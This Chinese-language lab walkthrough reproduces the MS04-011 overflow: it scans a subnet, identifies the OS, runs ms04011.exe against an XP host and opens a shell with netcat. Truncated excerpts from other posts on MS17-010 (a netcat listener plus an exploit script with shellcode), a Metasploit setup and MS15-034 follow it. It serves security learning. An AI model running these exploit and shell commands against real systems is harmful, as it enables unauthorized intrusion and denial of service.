首先是漏洞工具ms04-011 然後裡面有dsscan,getos,ms04011三個程式,
第乙個探測目標ip段是否有存在漏洞主機
第二個獲取目標ip主機的作業系統
第三個進行漏洞溢位
首先由於本機ip為172.16.1.44,所以將掃瞄範圍設定為172.16.1.1-254,然後新增之後,我們點選開始掃瞄
然後很顯然,後面寫著易受攻擊的(vulnerable)就是存在ms0411漏洞的機器
然後我們選擇乙個複製其ip,右擊172.16.1.80,選擇「copy ip to clipbrd」複製到剪貼簿。
然後我們在dos命令窗裡面切換到c:\ms04-011,然後執行getos.exe檔案,獲取目標ip主機的作業系統,可以看出來,是xp作業系統
然後輸入ms04011.exe 1 172.16.1.80進行溢位攻擊,因為是xp所以用1,如果是2000就用0,要注意1726才是溢位成功的**。
然後我們就會發現,在目標主機上會出現乙個關機倒計時的視窗,說明溢位成功
然後如果要通過這個漏洞獲取shell的話,就要用到nc工具了,輸入nc ip 1234 ,1234是溢位的埠號.
也許就會出現 c:/winnt/system32>
由於沒有mc,所以就沒有實驗
ms17 010漏洞復現
很老的洞了,只是老師上課講了,我就復現一遍。環境靶機為windows7並且存在此漏洞 攻擊機需要python3環境 nc lvp 8888 python ms17 010.py host 192.168.217.2 file shellcode 只需這兩條命令,便可以利用成功,其中ms17 010....
MS17 010漏洞復現
實驗環境 kali 虛擬機器 windows 7 x64 虛擬機器 1 檢視兩台機器的ip位址,且關閉win7防火牆 可見win7 ip為 192.168.15.129 kali 為 192.168.15.130 啟動 mdfconsole msfconsole 使用如下命令 第一句為利用auxil...
MS15 034漏洞總結
在2015年4月安全補丁日,微軟發布的眾多安全更新中,修復了http.sys中一處允許遠端執行 漏洞,編號為 cve 2015 1635 ms15 034 利用http.sys的安全漏洞,攻擊者只需要傳送惡意的http請求資料報,就可能遠端讀取iis伺服器的記憶體資料,或使伺服器系統藍屏崩潰。根據公...